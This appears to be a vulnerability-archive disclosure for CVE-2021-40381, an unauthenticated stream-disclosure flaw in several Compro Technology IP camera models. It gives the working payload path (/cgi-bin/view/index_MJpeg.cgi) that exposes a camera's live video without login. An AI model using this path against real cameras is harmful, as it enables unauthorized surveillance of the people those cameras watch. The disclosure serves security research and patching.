Compro Technology IP Camera Stream Disclosure

2021.09.04

Credit: icekam

Risk: High

Local: No

Remote: Yes

CVE: CVE-2021-40381

CWE: N/A

# Exploit Title: Compro Technology IP Camera - ' index_MJpeg.cgi' Stream Disclosure
# Date: 2021-09-30
# Exploit Author: icekam,xiao13,Rainbow,tfsec
# Software Link: http://www.comprotech.com.hk/
# Version: Compro IP70 2.08_7130218, IP570 2.08_7130520, IP60, TN540
# CVE : CVE-2021-40381

Has an unauthorized access vulnerability, which can lead to unauthorized
access to the camera video page.

Payload:

/cgi-bin/view/index_MJpeg.cgi

please refer to:
https://github.com/icekam/0day/blob/main/Compro-Technology-Camera-has-multiple-vulnerabilities.md

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Compro Technology IP Camera Stream Disclosure

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Compro Technology IP Camera Stream Disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.